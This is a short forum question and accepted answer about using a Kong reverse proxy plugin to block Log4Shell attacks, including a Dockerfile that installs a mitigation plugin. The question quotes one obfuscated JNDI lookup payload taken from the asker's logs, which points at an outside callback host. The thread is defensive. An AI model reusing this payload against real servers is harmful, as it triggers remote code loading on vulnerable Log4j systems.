Use kong reverse proxy to filter log4j exploits

Question

I am using a kong reverse proxy to proxy every HTTP request for my web servers. I would like to mitigate the current log4j problem ("log4shell") by finding and replace the critical attacers' strings like "jndi". For example I found this im my logs:

${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback}

I think this could be accomplished by using the request transformer plugin. Has anyone already done this?

P.S. Just replaceing jndi by disabled is too far-reaching and breaks a lot of things.

score 2 · Accepted Answer · answered Dec 16 '21 at 22:11

The guys from kong themselves recently sent a blog post that answers my question. They developed a kong plugin that mitigates the exploit.

I added this plugin to my kong by changing my Dockerfile:

FROM kong:2.6
...
USER root
...
# log4shell mitigation
# see https://konghq.com/blog/log4j-log4shell/
RUN git clone https://github.com/brentos/kong-plugin-log4shell && \
    cd kong-plugin-log4shell && \
    luarocks make
...
ENV KONG_PLUGINS ...,log4shell
...
USER kong

Then I just added this log4shell as a global plugin.

Use kong reverse proxy to filter log4j exploits

1 Answers1